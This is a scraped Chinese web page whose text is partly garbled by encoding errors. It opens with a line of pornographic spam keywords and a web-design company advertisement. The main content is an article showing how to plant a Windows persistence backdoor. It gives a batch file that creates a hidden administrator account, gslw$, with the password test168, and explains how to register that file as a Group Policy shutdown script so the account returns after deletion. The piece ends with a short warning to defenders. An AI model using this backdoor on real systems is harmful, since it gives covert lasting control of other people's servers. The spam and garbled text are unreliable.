日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
WINDOWS系統(tǒng)后門實(shí)例三

組策略欺騙,最隱蔽的后門

創(chuàng)新互聯(lián)專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù),包含不限于成都網(wǎng)站制作、網(wǎng)站設(shè)計(jì)、順城網(wǎng)絡(luò)推廣、小程序設(shè)計(jì)、順城網(wǎng)絡(luò)營(yíng)銷、順城企業(yè)策劃、順城品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營(yíng)等,從售前售中售后,我們都將竭誠(chéng)為您服務(wù),您的肯定,是我們最大的嘉獎(jiǎng);創(chuàng)新互聯(lián)為所有大學(xué)生創(chuàng)業(yè)者提供順城建站搭建服務(wù),24小時(shí)服務(wù)熱線:18982081108,官方網(wǎng)址:www.cdcxhl.com

組策略后門更加隱蔽。往冊(cè)表中添加相應(yīng)鍵值實(shí)現(xiàn)隨系統(tǒng)啟動(dòng)而運(yùn)行是木馬常用的伎倆,也為大家所熟知。其實(shí),在最策略中也可以實(shí)現(xiàn)該功能,不僅如此它還可以實(shí)現(xiàn)在系統(tǒng)關(guān)機(jī)時(shí)進(jìn)行某些操作。這就是通過(guò)最策略的“腳本(啟動(dòng)/關(guān)機(jī))”項(xiàng)來(lái)說(shuō)實(shí)現(xiàn)。具體位置在“計(jì)算機(jī)配置→Windows設(shè)置”項(xiàng)下。因?yàn)槠錁O具隱蔽性,因此常常被攻擊者利用來(lái)做服務(wù)器后門。

攻擊者獲得了服務(wù)器的控制權(quán)就可以通過(guò)這個(gè)后門實(shí)施對(duì)對(duì)主機(jī)的長(zhǎng)期控制。它可以通過(guò)這個(gè)后門運(yùn)行某些程序或者腳本,最簡(jiǎn)單的比如創(chuàng)建一個(gè)管理員用戶,他可以這樣做:

(1)創(chuàng)建腳本

創(chuàng)建一個(gè)批處理文件add.bat,add.bat的內(nèi)容是:

 
 
 
 
      
  
  
  
  1. @echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit 
    2.

(創(chuàng)建一個(gè)用戶名為gslw$密碼為test168的管理員用戶)。

(2)后門利用

在“運(yùn)行”對(duì)話框中輸入gpedit.msc,定位到“計(jì)算機(jī)配置一>Windows設(shè)置一>腳本(啟動(dòng)/關(guān)機(jī))”, 雙擊右邊窗口的“關(guān)機(jī)”,在其中添加add.bat。就是說(shuō)當(dāng)系統(tǒng)關(guān)機(jī)時(shí)創(chuàng)建gslw$用戶。對(duì)于一般的用戶是根本不知道在系統(tǒng)中有一個(gè)隱藏用戶,就是他看見(jiàn)并且刪除了該帳戶,當(dāng)系統(tǒng)關(guān)機(jī)時(shí)又會(huì)創(chuàng)建該帳戶。所以說(shuō),如果用戶不知道組策略中的這個(gè)地方那他一定會(huì)感到莫名其妙。

其實(shí),對(duì)于組策略中的這個(gè)“后門”還有很多利用法,攻擊者通過(guò)它來(lái)運(yùn)行腳本或者程序,嗅探管理員密碼等等。當(dāng)他們獲取了管理員的密碼后,就不用在系統(tǒng)中創(chuàng)建帳戶了,直接利用管理員帳戶遠(yuǎn)程登錄系統(tǒng)。因此它也是“雙刃劍”,希望大家重視這個(gè)地方。當(dāng)你為服務(wù)器被攻擊而莫名其妙時(shí),說(shuō)不定攻擊者就是通過(guò)它實(shí)現(xiàn)的。(圖6)

【編輯推薦】

  1. 后門木馬隱藏技術(shù)分析
  2. WINDOWS系統(tǒng)后門實(shí)例一
  3. 如何全面清除計(jì)算機(jī)電腦病毒
  4. WINDOWS系統(tǒng)后門實(shí)例二 圖
  5. Windows組策略保障共享目錄安全
  6. 安全設(shè)置Windows組策略有效阻止黑客

網(wǎng)頁(yè)名稱:WINDOWS系統(tǒng)后門實(shí)例三
網(wǎng)站鏈接:http://www.5511xx.com/article/cocohos.html